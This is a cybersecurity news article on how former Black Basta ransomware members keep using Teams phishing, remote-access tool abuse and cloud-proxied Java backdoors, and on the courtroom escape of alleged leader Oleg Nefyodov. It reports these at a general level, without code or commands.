Escape from the Courtroom, Phishing in Teams, and $600K in Cash — All That Remains of Black Basta
Former members have vanished from the radar, but their tactics are resurfacing on the cyber frontlines.
Despite the public downfall of the Black Basta group after internal chat leaks in February 2025, its former members continue using familiar attack methods — and are even actively evolving them. As highlighted in a report by ReliaQuest, traditional techniques like mass email campaigns and phishing via Microsoft Teams are now enhanced with Python scripts and covert delivery of malicious payloads through cloud services.
A key innovation in recent campaigns is the use of cURL requests to download and execute malicious scripts on victims' computers. These attacks have been observed in the financial, insurance, and construction sectors, where attackers impersonated tech support by exploiting compromised domains and fake accounts on “onmicrosoft[.]com” domains. Roughly half of all Teams phishing attacks from February to May 2025 originated from these domains — 42% of them from already compromised assets.
According to ReliaQuest, the attackers use the gained access to initiate remote sessions through Quick Assist and AnyDesk, after which a Python script is deployed to establish persistent command-and-control with the infected node. In some cases, victims are shown fake Windows login windows to steal credentials.
One of the most striking developments in the ongoing activity of former Black Basta members was the courtroom escape of alleged leader Oleg Nefyodov in Armenia. Local media reported that he was arrested on June 21, 2024, at Interpol’s request and was to be held for 72 hours while the court reviewed a prosecutor’s motion for temporary detention. However, on the day of the hearing, Nefyodov’s lawyer secured a 15-minute break, during which the defendant was granted "a walk" — and used the opportunity to escape.
Despite the disappearance of the Black Basta leak site, its techniques are experiencing a revival. There is reason to believe that some former members have joined the CACTUS group, as chat logs mention a transfer of $500,000–600,000 to its address. However, CACTUS has not posted new data on its leak site since March 2025, prompting speculation that the group may have either gone underground or disbanded.
A potential new refuge for former Black Basta operatives is the BlackLock group, which is believed to be affiliated with a new cartel called DragonForce. This alliance has surfaced in several major attack investigations in recent months.
Attack infrastructure is also evolving: enhanced Java backdoors, once used by Black Basta to steal credentials, are now leveraging cloud services like Google Drive and OneDrive for command proxying — a method that helps bypass traditional detection tools. In recent samples, proxy configuration fields were left blank, suggesting an intentional shift to exclusive use of cloud provider infrastructure.
New variants of this malware can transfer files, deploy SOCKS5 proxies, extract browser passwords, launch remote Java classes in memory, and even display fake login prompts — making them powerful tools for persistence and further exploitation.
These techniques, actively used by former Black Basta members, are now spreading to other groups. For instance, BlackSuit has adopted similar social engineering tactics, including Teams phishing and Quick Assist abuse, possibly indicating a transfer of tactics or members.
The reports also highlight several other malware strains in use. These include the Python-based Anubis backdoor, a Java backdoor, and a Rust-based utility believed to function as a loader for an SSH client. Of particular note is the QDoor tunneling backdoor — previously linked to BlackSuit — recently spotted in 3AM-style attacks, as described by Sophos.
Meanwhile, other cybercrime groups are conducting parallel campaigns. Scattered Spider is targeting MSP companies using Evilginx-based phishing pages to bypass MFA. Qilin (aka Agenda/Phantom Mantis) is exploiting Fortinet FortiGate vulnerabilities, and Play is leveraging CVE-2024-57727 in SimpleHelp software to breach U.S. organizations.
The internal conflict within the VanHelsing group recently led to the leak of its entire source code — including TOR keys, admin panel, blog database, and chat system. Additionally, Interlock has begun deploying a new JavaScript backdoor, NodeSnake, targeting UK government and education sectors.
As emphasized by Quorum Cyber, the use of RATs (Remote Access Trojans) remains the primary method for gaining and maintaining access to compromised systems. These tools allow attackers to control the machine, monitor user activity, deploy more malware, and exfiltrate data — making them indispensable in the modern cyberattack arsenal.
